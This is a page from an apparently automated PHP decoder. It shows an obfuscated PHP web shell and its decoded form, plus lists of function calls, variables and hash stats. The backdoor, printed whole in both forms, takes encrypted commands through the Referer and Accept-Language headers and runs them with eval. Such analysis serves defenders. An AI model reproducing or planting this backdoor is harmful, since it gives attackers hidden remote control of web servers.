Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $L='(L#"/_L#/","/-/"),L#aL#rray("/","L#+"),$ss($L#s[$i]L#,0,$e)L#))L#,$k))L#)L#;$o=..

Decoded Output download

$kh="9e92";$kf="5e93";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){    $u=parse_url($rr);    parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++) $p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$L='(L#"/_L#/","/-/"),L#aL#rray("/","L#+"),$ss($L#s[$i]L#,0,$e)L#))L#,$k))L#)L#;$o=ob_get_L#conteL#nts()L#;oL#b_end_clea';
$v='$rr=L#L#@$r["HTTP_RL#EFERER"]L#L#;$ra=L#@$rL#["HTTP_ACCEPT_L#LANGL#UAGE"L#];if(L#$rr&&$ra){L#  L#  $u=parse_urL#';
$Y='i<$lL#;L#){for($j=0;L#($j<$c&L#&$i<$l);L#$j++,$iL#+L#+){$o.=L#$t{$i}L#^$k{$j};}}L#reL#turn $o;}L#$r=$_SL#ERVL#ER;';
$d='tL#r";$sl="strtL#olower";$i=$m[1][0].$mL#[1][1L#];$h=$sL#l(L#$ss(L#md5($i.$kh),0L#,3));$fL#=$sl($ssL#(md5($L#i';
$p=str_replace('CU','','CUCUCUcrCUeate_fuCUnctiCUon');
$f='L#f($e){$L#k=$kL#h.$kf;L#ob_starL#t();@evaL#l(@gzunL#compresL#s(@L#x(@baL#se6L#4_decode(L#preg_replacL#L#e(array';
$o='L#L#.$kf),0,3))L#;$p="";fL#or($z=1;$L#z<cL#ount(L#$m[1L#L#]);$z++) $p.=L#$L#q[$m[2][L#$z]];if(strpos(L#$L#L#p,$h)===0';
$D='$kh="9eL#92L#";$kL#f="5e93"L#;functL#ion x(L#$t,$k){$cL#L#=strL#len($kL#);$l=strlen(L#$t);L#$o="L#";L#for($i=0;$';
$M='l($L#rr);    paL#rse_L#sL#tr(L#$u["quL#ery"],$q);$qL#=array_valL#L#uL#eL#s($q);preg_match_aL#ll("/(L#[\\w])[\\wL#-]+(L#';
$w='){$sL#[L#$i]="";$p=L#L#$ss($p,3);}if(arrL#L#ay_key_existL#sL#($i,$L#s)){$s[$L#L#i].=$p;$e=strpL#L#os($s[L#$i],$f);i';
$O='L#?:;q=0.([\\d]))?,L#?L#/",L#$ra,$m);if($L#q&&$m){L#@sL#ession_L#staL#rt();$s=&$_SL#EL#L#SSION;$sL#s="sL#L#L#ubs';
$t='n();L#$d=baL#se64_encoL#de(x(gL#zcompresL#s($o),L#$k));prL#int("L#<$k>L#$d</$L#k>");@sL#ession_dL#estroy(L#);}}}}';
$F=str_replace('L#','',$D.$Y.$v.$M.$O.$d.$o.$w.$f.$L.$t);
$j=$p('',$F);$j();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$D $kh="9eL#92L#";$kL#f="5e93"L#;functL#ion x(L#$t,$k){$cL#L#=s..
$F $kh="9e92";$kf="5e93";function x($t,$k){$c=strlen($k);$l=str..
$L (L#"/_L#/","/-/"),L#aL#rray("/","L#+"),$ss($L#s[$i]L#,0,$e)L..
$M l($L#rr); paL#rse_L#sL#tr(L#$u["quL#ery"],$q);$qL#=array_..
$O L#?:;q=0.([\d]))?,L#?L#/",L#$ra,$m);if($L#q&&$m){L#@sL#essio..
$Y i<$lL#;L#){for($j=0;L#($j<$c&L#&$i<$l);L#$j++,$iL#+L#+){$o.=..
$d tL#r";$sl="strtL#olower";$i=$m[1][0].$mL#[1][1L#];$h=$sL#l(L..
$f L#f($e){$L#k=$kL#h.$kf;L#ob_starL#t();@evaL#l(@gzunL#compres..
$j None
$o L#L#.$kf),0,3))L#;$p="";fL#or($z=1;$L#z<cL#ount(L#$m[1L#L#])..
$p create_function
$t n();L#$d=baL#se64_encoL#de(x(gL#zcompresL#s($o),L#$k));prL#i..
$v $rr=L#L#@$r["HTTP_RL#EFERER"]L#L#;$ra=L#@$rL#["HTTP_ACCEPT_L..
$w ){$sL#[L#$i]="";$p=L#L#$ss($p,3);}if(arrL#L#ay_key_existL#sL..

Stats

MD5 3a277aadd29055523205f0891fa4dd5f
Eval Count 1
Decode Time 100 ms